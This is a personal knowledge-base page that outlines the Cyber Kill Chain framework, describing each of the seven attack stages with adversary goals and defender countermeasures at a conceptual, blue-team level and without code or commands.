The Cyber Kill Chain - Nico's Knowledge Base

Framework created by Lockheed Martin to model attacks https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html Important to understand stages of attack and determine which actions start and follow in the chain. Analyze where the acts of the attacker have been detected by the system. Blue Teams ID where security measures are lacking based on flaws and take appropriate actions. 1. Reconnaissance 2. Weaponization 3. Delivery 4. Exploitation 5. Installation 6. Command & Control (C2) 7. Actions on Objectives --- ## 1 - Reconnaissance ### Passive Refers to the collecting of information from sources about target system without actually engaging them. Google search. ### Active Acquires information by engaging with the target directly. Submitting web requests, pings, anything that requires a response from the target. ### Adversary Goals The adversary wants to obtain as much of the following information as possible and more - version information of servers and software - open sources of information about the target previously being released - email addresses - internal or personal information about employees - detection of devices connected to internet - detection of security vulnerabilities on servers connected to internet - identifying IP address block - identifying vendors that organization works with - Tools: Shodan, Zoomeye ### Defender Goals Restrict the amount of information the attacker can obtain - Detect information disclosure with an external penetration test - obtain leak information about organization from Threat Intelligence sources - keep organizational documents off the internet - monitor traffic in areas that are accessible via internet - update as soon as updates are available to address new security vulnerabilities from being exploited --- ### 2 - Weaponization After utilizing information gathered in Recon, compile tools needed for the attack, or develop tools directly. The attack has not yet commenced, and the victim is likely unaware of the attacker. ### Adversary Goals Build or otherwise prepare essential components for the attack. - Create malware - develop exploits - Create malicious content to use in phishing attempt - email template, trojan document - identifying best instrument for cyber attack ### Defender Goals Not possible to directly prevent an attack at this stage. - Check systems to see if identified security vulnerabilities exist - install security updates as soon as possible - analyze impact of known or newly produced cyber attack tools on system - track down said tools and be able to detect when tools are utilized --- ## 3 - Delivery Execution of the prepared cyberattack. Payload is delivered via appropriate means. ### Adversary Goals Variety of methods to deliver payload to victim - malicious URL via email - malware as file attachment via email - malware via website - malicious URL via social media - malware via social media - direct upload to target server if possible - physical installation of malware directly via USB ### Defender Goals Precautionary measures at this stage. Cannot totally prevent cyber attack, but can minimize risk. - Skeptical attitude to each URL in email content, viewed via sandbox environment - scan email attachments with antivirus - email security solution products - provide users and employees with infosec training - constant monitoring of server access and log recording - effective use and management of security solutions ilke firewall - conduct detailed analysis when needed - detect anomalies and determine reasoning --- ## 4 - Exploitation Attacker ensures the malicious content delivered in step 3 is activated. ### Adversary Goals Attacker has basic knowledge about the program intended to be exploited, and now runs the tool to exploit - execute the exploit that exploits the hardware vulnerability - execute the exploit that exploits a vulnerability of software or operating system - execute malware ### Defender Goals This stage is much more intricate and labor-intensive compared to other stages for blueteam. Typically, due to previously unseen malware/exploits, which adds layer of complexity. - Train employees when it is/not necessary to open a file uploaded on systems - constant monitoring of system security operations belonging to organization - tracking security vulnerabilties published for the assets of the organization - write monitoring rule - detect when exploited - install securtiy updates for assets belonging to security organiztion - monitor activity on endpoints using EDR products - provide secure coding training to software developers to prevent security vulns in locally developed applications - Conduct pentests on assets of the organization regularly - regularly automated vulnerability scanning and monitoring of reports - organizing authorizations on assets belonging to institution and giving each account authority needed --- ## 5 - Installation Maintain persistence on target that has been exploited. Attacker attempts to gain access path that can be accessed at any time via backdoor on the system. Since exploit will be patched eventually, a different method must be used on the target system. Privilege escalation is typically attempted at this stage to assure system persistence. ## Adversary Goals Perform various technological activities provided, constrained to their authority in the exploited system. While performing these operations, attacker tries to leave as few traces as possible to remain undetected for the maximal amount of time to carry out the attack. - install malware on victim's device - place backdoor on victim's system - install web shell on web server - add service, firewall rule, or scheduled task to ensure persistence of victim device ### Defender Goals Threat Hunters are deployed. If an attacker reaches this stage, there are malicious activities that cannot be detected automatically. Whether attacker is present or not, SOC team treats operations as if there is always an attacker present in the system. - Network Security Monitoring operations on all assets - use EDR security to be aware of configuration changes on each endpoint - restrict access to critical files on systems and monitoring access - restrict access to crticial paths - allow use of admin privileges only for mandatory situations - detecting malicious process activities by monitoring processes running on systems - allow only executable files with valid signature to be run on the system - detect anomalies in all monitored system activities to find root cause --- ## 6 - Command and Control (C2) The Attacker has completed the necessary tasks to compromise the victim and has the CC server to deliver commands to the victim. Remote commands can be sent and executed here. ### Adversary Goals Connection established between C2 and target system - Configure C2 to communicate with victim - Implement necessary actions to make contact with C2 possible ## Defender Goals No specific actions to take. General monitoring and detection techniques should be considered. - Determine whether known C2 tools are available on systems - Block C2 server IP addresses from Cyber Threat Intelligence sources through firewalls and other security products - detect network traffic that may be C2 communication with Network Security Monitoring on the system --- ## 7 - Actions on Objectives The Attacker takes actions planned during the first stages in the attack. Their desired operations are followed through upon here. ### Adversary Goals Targeted moves may differ during this stage - Encrypt files on system with help of ransomware - exfiltrate critical information/documents within system - damage system by deleting crticial information - apply more authorized operations with privilege escalation operations to expand scope of cyber attack by providing access to other machines on network - collect user credentials to gain access to other devices - collect information - change or manipulate information in system ### Defender Goals Blue team may take different actions on each process to detect and stop attacker activity. System must be regularly monitored. Most fundamental measures taken are preventing exfiltration of data. - detect anomalies in network traffic - restrict network access to outside and monitor continuously - restrict access to files/folders containing critical information and controlling access regularly - restricting authorization of access to databases containing critical information and continuously monitoring access - using DLP to prevent data leakage - detect unauthorized access by users